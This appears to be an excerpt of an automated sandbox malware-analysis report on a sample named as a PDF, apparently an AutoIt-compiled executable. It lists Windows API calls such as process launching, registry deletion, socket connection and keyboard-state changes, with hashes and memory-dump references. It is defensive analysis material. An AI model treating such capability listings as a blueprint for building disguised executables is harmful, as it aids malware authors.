                                    • Instruction Fuzzy Hash: C361FE71508311ABD720EF25CC81FAFB7E9EF94B14F00491DF68697292DB79A904CB92
                                    APIs
                                    • IsWindow.USER32(00B95080), ref: 0103B6A5
                                    • IsWindowEnabled.USER32(00B95080), ref: 0103B6B1
                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0103B795
                                    • SendMessageW.USER32(00B95080,000000B0,?,?), ref: 0103B7CC
                                    • IsDlgButtonChecked.USER32(?,?), ref: 0103B809
                                    • GetWindowLongW.USER32(00B95080,000000EC), ref: 0103B82B
                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0103B843
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                    • String ID:
                                    • API String ID: 4072528602-0
                                    • Opcode ID: 3024f94de7f14b2385dc1ea63b90905caaa6f8241801fc392c02302deaf96a15
                                    • Instruction ID: ea22c0f9bc8f00db88162c618665e0448fa353fc347545ab07e0fb7528ea69ac
                                    • Opcode Fuzzy Hash: 3024f94de7f14b2385dc1ea63b90905caaa6f8241801fc392c02302deaf96a15
                                    • Instruction Fuzzy Hash: 2A71B474A00205AFEB629F68C894FBA7BFDFF8D344F084099E9C697252C736A541DB50
                                    APIs
                                    • _memset.LIBCMT ref: 0102F75C
                                    • _memset.LIBCMT ref: 0102F825
                                    • ShellExecuteExW.SHELL32(?), ref: 0102F86A
                                      • Part of subcall function 00FB9997: __itow.LIBCMT ref: 00FB99C2
                                      • Part of subcall function 00FB9997: __swprintf.LIBCMT ref: 00FB9A0C
                                      • Part of subcall function 00FCFEC6: _wcscpy.LIBCMT ref: 00FCFEE9
                                    • GetProcessId.KERNEL32(00000000), ref: 0102F8E1
                                    • CloseHandle.KERNEL32(00000000), ref: 0102F910
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                    • String ID: @
                                    • API String ID: 3522835683-2766056989
                                    • Opcode ID: 8696de48331aaa3ab6e97c9f75f139893de64e75a0dc00b6e8040f932d2b9999
                                    • Instruction ID: 31caae60da1dd7aef51e9bd40b032c0a82f8aa22471d6819192f3e5d44ee7e9b
                                    • Opcode Fuzzy Hash: 8696de48331aaa3ab6e97c9f75f139893de64e75a0dc00b6e8040f932d2b9999
                                    • Instruction Fuzzy Hash: 7861BD75A0062ADFCB14EF65C9809AEFBF5FF48310B148459E98AAB351CB74AD40CF90
                                    APIs
                                    • GetParent.USER32(?), ref: 0101149C
                                    • GetKeyboardState.USER32(?), ref: 010114B1
                                    • SetKeyboardState.USER32(?), ref: 01011512
                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 01011540
                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 0101155F
                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 010115A5
                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 010115C8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessagePost$KeyboardState$Parent
                                    • String ID:
                                    • API String ID: 87235514-0
                                    • Opcode ID: e414581b9b7230eaa1d412630d8ad46092d4416026b1fcb74385def8996309f3
                                    • Instruction ID: ec0d73cda7df5bc314a19076abc1ba1c71dd10faa00b30af09410d3d6b8434ab
                                    • Opcode Fuzzy Hash: e414581b9b7230eaa1d412630d8ad46092d4416026b1fcb74385def8996309f3
                                    • Instruction Fuzzy Hash: BD51F2B0A447D67EFB3A42788805BBABEE96F06304F0C45C9E3D5468C6C6BD9884D750
                                    APIs
                                    • GetParent.USER32(00000000), ref: 010112B5
                                    • GetKeyboardState.USER32(?), ref: 010112CA
                                    • SetKeyboardState.USER32(?), ref: 0101132B
                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 01011357
                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 01011374
                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 010113B8
                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 010113D9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessagePost$KeyboardState$Parent
                                    • String ID:
                                    • API String ID: 87235514-0
                                    • Opcode ID: 97e5c8b61fdcf43155a4b3a0477ffb45d216882c4c6288bbc6c5cd288acbe55e
                                    • Instruction ID: c145c3c41d0ce4191a9e462419dcb2f732e52105310ee4861d873b88d2998b21
                                    • Opcode Fuzzy Hash: 97e5c8b61fdcf43155a4b3a0477ffb45d216882c4c6288bbc6c5cd288acbe55e
                                    • Instruction Fuzzy Hash: 4251D4B09447D63DFB3A42388C45BBABEE96F06200F0885C9E3D546CCAD7A9A894D751
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _wcsncpy$LocalTime
                                    • String ID:
                                    • API String ID: 2945705084-0
                                    • Opcode ID: eabec40fcdabc49d6e8ec34a46db31c160f470ab92bf10ac937ed31562f37dbd
                                    • Instruction ID: 8807fe03622c406e032ae71d14f63407db626c6e6c68ee3005f81939b2e576e5
                                    • Opcode Fuzzy Hash: eabec40fcdabc49d6e8ec34a46db31c160f470ab92bf10ac937ed31562f37dbd
                                    • Instruction Fuzzy Hash: CC41B5A6C2061876CB50F7B48C869CF77A9AF05311F548467FA18E3211E638E314D7E6
                                    APIs
                                      • Part of subcall function 010148AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,010138D3,?), ref: 010148C7
                                      • Part of subcall function 010148AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,010138D3,?), ref: 010148E0
                                    • lstrcmpiW.KERNEL32(?,?), ref: 010138F3
                                    • _wcscmp.LIBCMT ref: 0101390F
                                    • MoveFileW.KERNEL32(?,?), ref: 01013927
                                    • _wcscat.LIBCMT ref: 0101396F
                                    • SHFileOperationW.SHELL32(?), ref: 010139DB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                    • String ID: \*.*
                                    • API String ID: 1377345388-1173974218
                                    APIs
                                    • _memset.LIBCMT ref: 01037519
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 010375C0
                                    • IsMenu.USER32(?), ref: 010375D8
                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 01037620
                                    • DrawMenuBar.USER32 ref: 01037633
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                    • String ID: 0
                                    • API String ID: 3866635326-4108050209
                                    APIs
                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0103125C
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01031286
                                    • FreeLibrary.KERNEL32(00000000), ref: 0103133D
                                      • Part of subcall function 0103122D: RegCloseKey.ADVAPI32(?), ref: 010312A3
                                      • Part of subcall function 0103122D: FreeLibrary.KERNEL32(?), ref: 010312F5
                                      • Part of subcall function 0103122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 01031318
                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 010312E0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                    • String ID:
                                    • API String ID: 395352322-0
                                    APIs
                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0103655B
                                    • GetWindowLongW.USER32(00B95080,000000F0), ref: 0103658E
                                    • GetWindowLongW.USER32(00B95080,000000F0), ref: 010365C3
                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 010365F5
                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0103661F
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 01036630
                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0103664A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: LongWindow$MessageSend
                                    • String ID:
                                    • API String ID: 2178440468-0
                                    APIs
                                      • Part of subcall function 010280A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 010280CB
                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 010264D9
                                    • WSAGetLastError.WSOCK32(00000000), ref: 010264E8
                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 01026521
                                    • connect.WSOCK32(00000000,?,00000010), ref: 0102652A
                                    • WSAGetLastError.WSOCK32 ref: 01026534
                                    • closesocket.WSOCK32(00000000), ref: 0102655D
                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 01026576
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                    • String ID:
                                    • API String ID: 910771015-0
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0100E0FA
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0100E120
                                    • SysAllocString.OLEAUT32(00000000), ref: 0100E123
                                    • SysAllocString.OLEAUT32 ref: 0100E144
                                    • SysFreeString.OLEAUT32 ref: 0100E14D
                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 0100E167
                                    • SysAllocString.OLEAUT32(?), ref: 0100E175
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                    • String ID:
                                    • API String ID: 3761583154-0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                    • API String ID: 1038674560-2734436370
                                    APIs
                                      • Part of subcall function 00FB1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FB1D73
                                      • Part of subcall function 00FB1D35: GetStockObject.GDI32(00000011), ref: 00FB1D87
                                      • Part of subcall function 00FB1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FB1D91
                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 010378A1
                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 010378AE
                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 010378B9
                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 010378C8
                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 010378D4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend$CreateObjectStockWindow
                                    • String ID: Msctls_Progress32
                                    • API String ID: 1025951953-3636473452
                                    APIs
                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00FD4292,?), ref: 00FD41E3
                                    • GetProcAddress.KERNEL32(00000000), ref: 00FD41EA
                                    • EncodePointer.KERNEL32(00000000), ref: 00FD41F6
                                    • DecodePointer.KERNEL32(00000001,00FD4292,?), ref: 00FD4213
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                    • String ID: RoInitialize$combase.dll
                                    • API String ID: 3489934621-340411864
                                    APIs
                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00FD41B8), ref: 00FD42B8
                                    • GetProcAddress.KERNEL32(00000000), ref: 00FD42BF
                                    • EncodePointer.KERNEL32(00000000), ref: 00FD42CA
                                    • DecodePointer.KERNEL32(00FD41B8), ref: 00FD42E5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                    • String ID: RoUninitialize$combase.dll
                                    • API String ID: 3489934621-2819208100
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _memmove$__itow__swprintf
                                    • String ID:
                                    • API String ID: 3253778849-0
                                    APIs
                                      • Part of subcall function 00FB7F41: _memmove.LIBCMT ref: 00FB7F82
                                      • Part of subcall function 010310A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,01030038,?,?), ref: 010310BC
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01030548
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01030588
                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 010305AB
                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 010305D4
                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 01030617
                                    • RegCloseKey.ADVAPI32(00000000), ref: 01030624
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                    • String ID:
                                    • API String ID: 4046560759-0
                                    APIs
                                    • GetMenu.USER32(?), ref: 01035A82
                                    • GetMenuItemCount.USER32(00000000), ref: 01035AB9
                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 01035AE1
                                    • GetMenuItemID.USER32(?,?), ref: 01035B50
                                    • GetSubMenu.USER32(?,?), ref: 01035B5E
                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 01035BAF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Menu$Item$CountMessagePostString
                                    • String ID:
                                    • API String ID: 650687236-0
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 0100F3F7
                                    • VariantClear.OLEAUT32(00000013), ref: 0100F469
                                    • VariantClear.OLEAUT32(00000000), ref: 0100F4C4
                                    • _memmove.LIBCMT ref: 0100F4EE
                                    • VariantClear.OLEAUT32(?), ref: 0100F53B
                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0100F569
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                    • String ID:
                                    • API String ID: 1101466143-0
                                    APIs
                                    • _memset.LIBCMT ref: 01012747
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01012792
                                    • IsMenu.USER32(00000000), ref: 010127B2
                                    • CreatePopupMenu.USER32 ref: 010127E6
                                    • GetMenuItemCount.USER32(000000FF), ref: 01012844
                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 01012875
                                    Similarity
                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                    • String ID:
                                    • API String ID: 3311875123-0
                                    • Opcode ID: 14fc9beae39f92987f9d9a7ae8159f47c58a4d8d929db60dbc6e525ede5157d2
                                    • Instruction ID: bf37e04d2edb21c7ed3d6424df1f4a4b65f1aa33b8de57daad4894e87c86da1e
                                    • Opcode Fuzzy Hash: 14fc9beae39f92987f9d9a7ae8159f47c58a4d8d929db60dbc6e525ede5157d2
                                    • Instruction Fuzzy Hash: 3551B170A01306DFDF25CF68D888BAEBBF5BF44314F204199F9919B299D7788944CB51
                                    APIs
                                      • Part of subcall function 00FB2612: GetWindowLongW.USER32(?,000000EB), ref: 00FB2623
                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 00FB179A
                                    • GetWindowRect.USER32(?,?), ref: 00FB17FE
                                    • ScreenToClient.USER32(?,?), ref: 00FB181B
                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00FB182C
                                    • EndPaint.USER32(?,?), ref: 00FB1876
                                    Similarity
                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                    • String ID:
                                    • API String ID: 1827037458-0
                                    • Opcode ID: aaa92ed18eb2d759e8407db611ed168e068a2a58d19730bb580854b372dca60d
